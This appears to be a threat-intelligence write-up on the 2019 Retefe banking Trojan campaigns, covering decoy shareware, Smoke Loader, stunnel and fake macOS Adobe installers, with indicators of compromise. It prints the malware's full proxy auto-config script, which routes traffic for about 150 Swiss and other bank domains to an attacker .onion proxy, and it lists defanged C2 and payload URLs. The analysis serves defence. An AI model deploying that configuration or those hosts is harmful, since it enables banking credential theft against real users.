Overview
Retefe is a banking Trojan that historically has routed online banking traffic intended for targeted banks through a proxy instead of the web injects more typical of other bankers. In the past, Retefe campaigns have targeted Austria, Sweden, and Switzerland, among other regions, such as users of UK online banking sites. Retefe is generally delivered via zipped JavaScript as well as Microsoft Word documents [1].
Although Retefe only appeared infrequently in 2018, the banker returned to more regular attacks on Swiss and German victims in April of 2019 with both a Windows and macOS version.
Retefe’s return to the landscape was marked by several noteworthy changes:
- Using stunnel instead of TOR to secure its proxy redirection and command and control communications
- The use of Smoke Loader rather than sLoad as an intermediate loader
- The abuse of a shareware application known as “Convert PDF to Word Plus 1.0”; this is a Python script that has been packaged as an executable using PyInstaller and packed into an archive using the UPX packing engine.
Abused Shareware as Part of the Retefe Installation Stack
Proofpoint researchers identified the abused shareware application in a public malware repository in March 2019. It originates from http://lettercreate.com/unipdf/convert-pdf-to-word-plus[.]exe and uses a certificate issued by DigiCert.
The CCN is “BULDOK LIMITED/emailAddress=admin@buldoklimited[.]info”.
Figure 1 shows the resulting Python code once the executable has been unpacked, unpackaged, and decompiled.
Figure 1: Resulting Python code when convert-pdf-to-word-plus.exe is unpacked, unpackaged, and decompiled.
The Python script writes two files named convert-pdf-to-word-plus.exe and convert-pdf-to-word-plus_driver.exe to the %TEMP% directory and executes them.
We currently believes that the convert-pdf-to-word-plus.exe file is a legitimate installer for the “Convert PDF to Word Plus” application (Figure 2) and is executed as a decoy.
Figure 2: Convert PDF to Word Plus Installer
Convert-pdf-to-word-plus_driver.exe, on the other hand, is malicious and is Retefe’s loader. As can be seen in Figure 3, the loader extracts 7-Zip and stunnel from its resources then decrypts and executes the main Retefe JavaScript code.
Figure 3: Retefe Loader
As shown in the figure above, Retefe extracts stunnel via a compressed archive in place of the usual TOR Socat proxy. In addition to the use of the decoy abused shareware, this is the most significant observed change to Retefe’s behavior, along with the use of Smoke Loader.
Smoke Loader Now Bootstraps Retefe
On April 17, Proofpoint researchers observed a geographically targeted campaign against Switzerland using the email lure below (Fig. 4). This campaign used an Object Linking and Embedding (OLE) package to deliver Smoke Loader.
Approximately two hours following infection, we observed Smoke Loader downloading Retefe with the following hash:
925ce9575622c59baacc70c0593a458a76731c5f195c6a7a790abc374402725e
Figure 4: Lure document used to drop Smoke Loader, which in turn downloads Retefe
A copy of the Retefe dropper PowerShell script can be downloaded here for further analysis:
https://github.com/EmergingThreats/threatresearch/blob/master/retefe/retefedropperapr2019
This script contains the content required for Retefe persistence, including the scheduled tasks for 7-Zip and the stunnel secure tunneling software.
Secure Tunneling (stunnel) Replaces Tor
It is not clear why Retefe’s authors have now deprecated Tor in favor of stunnel. However, we suspect that the use of a dedicated tunnel rather than Tor makes for a more secure connection because it eliminates the possibility of snooping on the hops between Tor nodes. Tor is also a “noisier” protocol and thus would be easier to detect in an enterprise environment than stunnel, which would appear as any other outbound SSL connection.
Proxy Information From the Retefe Binary
Below is a portion of the proxy configuration that lists the online banking sites whose users are targeted by this instance of Retefe. The complete proxy configuration is in the appendix.
function FindProxyForURL(url, host) {
var proxy = "PROXY ltro3fxssy7xsqgz.onion:5588;";
var hosts = new Array('cs.directnet.com', '*akb.ch', '*ubs.com', '*bkb.ch', '*lukb.ch', '*zkb.ch',
'*onba.ch', '*gkb.ch', '*bekb.ch', '*zugerkb.ch', '*bcge.ch', .
.
.
.
'*volksbank.li', '*bendura.li', '*lgt.com', '*retefe*.ch', '*mirabaud.lu');
for (var i = 0; i < hosts.length; i++) {
if (shExpMatch(host, hosts[i])) {
return proxy
}
}
return
Malware Masquerading as Adobe Installer Applications
Figure 5: macOS Adobe Cloud installer
Unlike the Retefe campaigns targeting Microsoft Windows hosts until December 2018, campaigns targeting macOS have continued throughout the first several months of 2019. These campaigns continued to use developer-signed versions of fake Adobe Installers in order to deliver their payloads.
Below is the signature used to sign the Retefe binary. By using signed binaries, actors attempt to bypass the macOS internal Gatekeeper security application, which checks if applications are signed by a valid developer certificate before running. The output was created by running the command codesign -dv --verbose=4 on the installer binary.
Identifier=Ryan_Ltd.Software Format=app bundle with Mach-O thin (x86_64) CodeDirectory v=20200 size=341 flags=0x0(none) hashes=10+3 location=embedded OSPlatform=36 OSSDKVersion=657920 OSVersionMin=657664 Hash type=sha1 size=20 CandidateCDHash sha1=f839edca246ddf3881cb3f2821a900b252330a59 Hash choices=sha1 Page size=4096 CDHash=f839edca246ddf3881cb3f2821a900b252330a59 Signature size=8525 Authority=Developer ID Application: Oleg Kosourov (Q9HZ55M855) Authority=Developer ID Certification Authority Authority=Apple Root CA Timestamp=Jan 21, 2019, 3:43:51 AM Info.plist entries=23 TeamIdentifier=Q9HZ55M855 Sealed Resources version=2 rules=12 files=5 Internal requirements count=1 size=180
Gatekeeper enforces application integrity by checking the validity of the Developer ID associated with an application. When an app is created, it is digitally signed with a certificate and the associated name of the developer. The notarization status verifies the application is from the identified developer and has not been changed. Further changes by Apple in macOS Mojave include app notarization, an additional integrity check for the signed application [2].
Conclusion
Retefe is unusual in its use of proxies to redirect victims to fake bank pages for credential theft instead of employing web injects for man-in-the-browser attacks like most banking Trojans. Developers appear to have updated key features of the Trojan and are employing new distribution mechanisms including fake apps and switching to Smoke Loader as its intermediate downloader after a fairly lengthy absence from the landscape. Retefe in particular is noted for changing its proxy configuration, having previously used Profixifier and in 2019 moving to stunnel. As with many types of malware, developers continue to innovate, identifying new, more effective ways to infect victims and steal personal information to better monetize their attacks.
References
[1] https://www.govcert.admin.ch/blog/33/the-retefe-saga
[2] https://support.apple.com/en-us/HT202491
Acknowledgment
Special thanks to @JaromirHorejsi for assistance sourcing samples of Retefe
Indicators of Compromise (IOCs)
|
IOC |
IOC Type |
Description |
|
3d9bd35cc82712e3ec02ccb561633c8ab130348ffae259a35edf927e9c770052 |
SHA256 |
Fake convert-pdf-to-word-plus.exe |
|
4415cc989396ae301d103d11dd3aa7c90cbf9fb3a7aa49113a410efab8edebe3 |
SHA256 |
Legitimate convert-pdf-to-word-plus.exe |
|
dcb9ceeedfeb1b5a19f8898cd7c3be8f2afda9ad2ee3afaf12e65c0c07783c8b |
SHA3256 |
Retefe Loader (convert-pdf-to-word-plus_driver.exe) |
|
6750c9224540d7606d3c82c7641f49147c1b3fd0 |
Certificate Hash |
DigiCert Certificate |
|
e5d05fe5b3ff65fc4c7021908164b9e73b24f95f63c594602680400a48e32845 1a4aa8a7cd6e21e3af77c9035905ac9109d95d11752b095d0fc48e63859cdf49 01bfea6b092c3c6067f0b13a291188537d07de026d53337113b994267b83d85a 92c153772281baf565cdf8dc62fa56208ec2cc01c3d78d206b5c51c162634cc4 d9d9e7cec1d4a33eda01b00e161ed147ae0a3a9a45c92cd926235ec3bbaa8f47 07c53aa5858189c52b8ab30929b3383c0558cf762bd2c312ee2d35a222941c89 e99468f96a3825145a06a418e9ddc5ad8c0124b371df370febb137ac20fed443 a0f468a4f1edc8e99225baf58bcfd6b0c280460f177f6b5e2cf2a6b3479536a1 9cf0ac320a3b6a3e3ec894816e976037b9168b114513a5cbcc3b168758499b11 a304e2656385f7551ef49e84b673f6ca106ce3e005d36a02db4038f31d5a774f a2b60d8200946bb33bb67d93cbae0b09b8999e9ea44449997f1a499d16091e97 07e5034744d819e59c2ec2bcfa8904cee29d4f9eae210575abfcfb89876fee65 988d04827f8bd7526a0b6f4c5704b19e9bd512d015bc5eda18b41f7f85e239d0 0d5460739d9a2c9460001b31237565ba77de02cdab329b21ad9222899d465f17 e7ab3f221548d6bfd67248fb62ff767224f5ccb4505409e41ff04eb364c461a1 68762eea44ba7fec72405a84bc7af2d9f3cec3ad82f0dae7568e416fa01a1cbb dbe9bc07f721e383fea0c64cdd222a0d5e9284e2b720f95b92418471e6e64ff9 c81cd3faf9ef1a01697fac4b19e89e8749d9599339bc6f95a48a61794d183a18 06f35768884874be9a76b5235e64f6fed933ed46ea431e29805b2837df58fddb
f3549eab33aaeee003450004a0485b393dd336a7a4c2ea717e08a26e5addc903 |
SHA256 |
macOS dmg files masquerading as Adobe installer. |
|
hxxp://lettercreate.com/unipdf/convert-pdf-to-word-plus.exe |
URL |
Backdoored application |
|
925ce9575622c59baacc70c0593a458a76731c5f195c6a7a790abc374402725e |
SHA256 |
Smoke Loader downloaded Retefe |
|
a75986c65170c28e5306673fd117c8e47b186895054b6f2681146c09d3f0d107 |
SHA256 |
SmokeLoader Document |
|
hxxp://www.laserowakasia.pl/wp-rss[.]php hxxp://racyroyalcoin.com/wp-rss[.]php hxxp://bizbhutanevents.com/wp-rss[.]php hxxp://www.kjkpropertysolutions.com/wp-rss[.]php hxxp://thealtilium.com/wp-rss[.]php |
urls |
SmokeLoader c2 |
|
e53a9b2a484a052fc47df2a499bf942d350f052054ae9a67bdcc13f46c3d9c5b |
SHA256 |
SmokeLoader |
ET and ETPRO Suricata/Snort Signatures
2835551 ETPRO TROJAN Observed SmokeLoader Style Connectivity Check
2022130 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Retefe CnC)
Appendix
Full proxy configuration
function FindProxyForURL(url, host) {
var proxy = "PROXY ltro3fxssy7xsqgz.onion:5588;";
var hosts = new Array('cs.directnet.com', '*akb.ch', '*ubs.com', '*bkb.ch', '*lukb.ch', '*zkb.ch',
'*onba.ch', '*gkb.ch', '*bekb.ch', '*zugerkb.ch', '*bcge.ch', '*credit-suisse.com', '*.clientis.ch',
'clientis.ch', '*bcvs.ch', '*.cic.ch', 'cic.ch', 'ukb.ch', '*.ukb.ch', 'urkb.ch', '*.urkb.ch',
'*eek.ch','*szkb.ch', '*shkb.ch', '*glkb.ch', '*nkb.ch', '*owkb.ch', '*cash.ch', '*bcf.ch',
'*bcv.ch', '*juliusbaer.com', '*abs.ch', '*bcn.ch', '*blkb.ch', '*bcj.ch', '*zuercherlandbank.ch',
'*bankthalwil.ch', '*piguetgalland.ch', '*inlinea.ch', '*bernerlandbank.ch', '*bancasempione.ch',
'*bsibank.com', '*corneronline.ch', '*vermoegenszentrum.ch', '*gobanking.ch', '*slbucheggberg.ch',
'*slfrutigen.ch', '*hypobank.ch', '*regiobank.ch', '*rbm.ch', '*ersparniskasse.ch', '*ekr.ch',
'*sparkasse-dielsdorf.ch', '*.eki.ch', '*bankgantrisch.ch', '*bbobank.ch', '*alpharheintalbank.ch',
'*aekbank.ch', '*acrevis.ch', '*credinvest.ch', '*zarattinibank.ch', '*appkb.ch', '*arabbank.ch',
'*apbank.ch', '*bankbiz.ch', '*bankleerau.ch', '*btv3banken.ch', '*dcbank.ch', '*bordier.com',
'*banquethaler.com', '*bankzimmerberg.ch', '*bbva.ch', '*bankhaus-jungholz.ch', '*sparhafen.ch',
'*banquecramer.ch', '*banqueduleman.ch', '*ebankingch.bcp.bank', '*bil.com', '*vontobel.com',
'*pbgate.net', '*bnpparibas.com', '*ceanet.ch', '*ce-riviera.ch', '*cedc.ch', '*cmvsa.ch',
'*ekaffoltern.ch', '*glarner-regionalbank.ch', '*cen.ch', '*cbhbank.com', '*coutts.com',
'*cimbanque.net', '*commerzbank.com', '*dominickco.ch', '*efginternational.com', '*falconpb.com',
'*gemeinschaftsbank.ch', '*frankfurter-bankgesellschaft.com', '*globalance-bank.com', '*ca-nextbank.ch',
'*hsbcprivatebank.com', '*leihkasse-stammheim.ch', '*incorebank.ch', '*lienhardt.ch', '*maerki-baumann.ch',
'*mirabaud.com', '*pbihag.ch', '*rahnbodmer.ch', '*mybancaria.ch', '*reyl.com', '*saanenbank.ch',
'*sebgroup.com', '*slguerbetal.ch', '*bankslm.ch', '*neuehelvetischebank.ch', '*slr.ch', '*slwynigen.ch',
'*sparkasse.ch', '*umtb.ch', '*trafina.ch', '*ubp.com', 'direct.directnet.com', '*tkb.ch',
'onlinebanking.directnet.com', 'onlinebanking.nab.ch', 'onlinebankingbusiness.nab.ch', '*cler.ch',
'mabanque.bnpparibas', '*llb.li', '*bankfrick.li', '*vpbank.com', '*bankalpinum.com', '*unionbankag.com',
'*neuebankag.li', '*raiffeisen.li', '*volksbank.li', '*bendura.li', '*lgt.com', '*retefe*.ch', '*mirabaud.lu');
for (var i = 0; i < hosts.length; i++) {
if (shExpMatch(host, hosts[i])) {
return proxy
}
}
return